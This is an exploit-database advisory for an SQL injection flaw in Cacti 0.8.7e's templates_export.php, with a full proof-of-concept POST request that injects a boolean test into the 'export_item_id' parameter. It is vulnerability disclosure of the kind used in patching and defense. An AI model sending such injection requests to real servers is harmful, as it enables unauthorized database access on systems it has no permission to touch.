Cacti 0.8.7e - SQL Injection

EDB-ID:

12338


Platform:

PHP

Published:

2010-04-22

CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
A Vulnerability has been discovered in Cacti, which can be exploited by any
user to conduct SQL Injection attacks.
Input passed via the “export_item_id” parameter to “templates_export.php”
script is not properly sanitized before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL
code.
The following is a Proof of Concept POST request:
POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: 192.168.1.107
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://192.168.1.107/cacti-0.8.7e/templates_export.php
Cookie: Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&save_component_export=1&action=save&x=24&y=12

===========================================================================
Download:
===========================================================================
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf)


<Bonsai Information Security Advisories>
http://www.bonsai-sec.com/en/research/vulnerability.php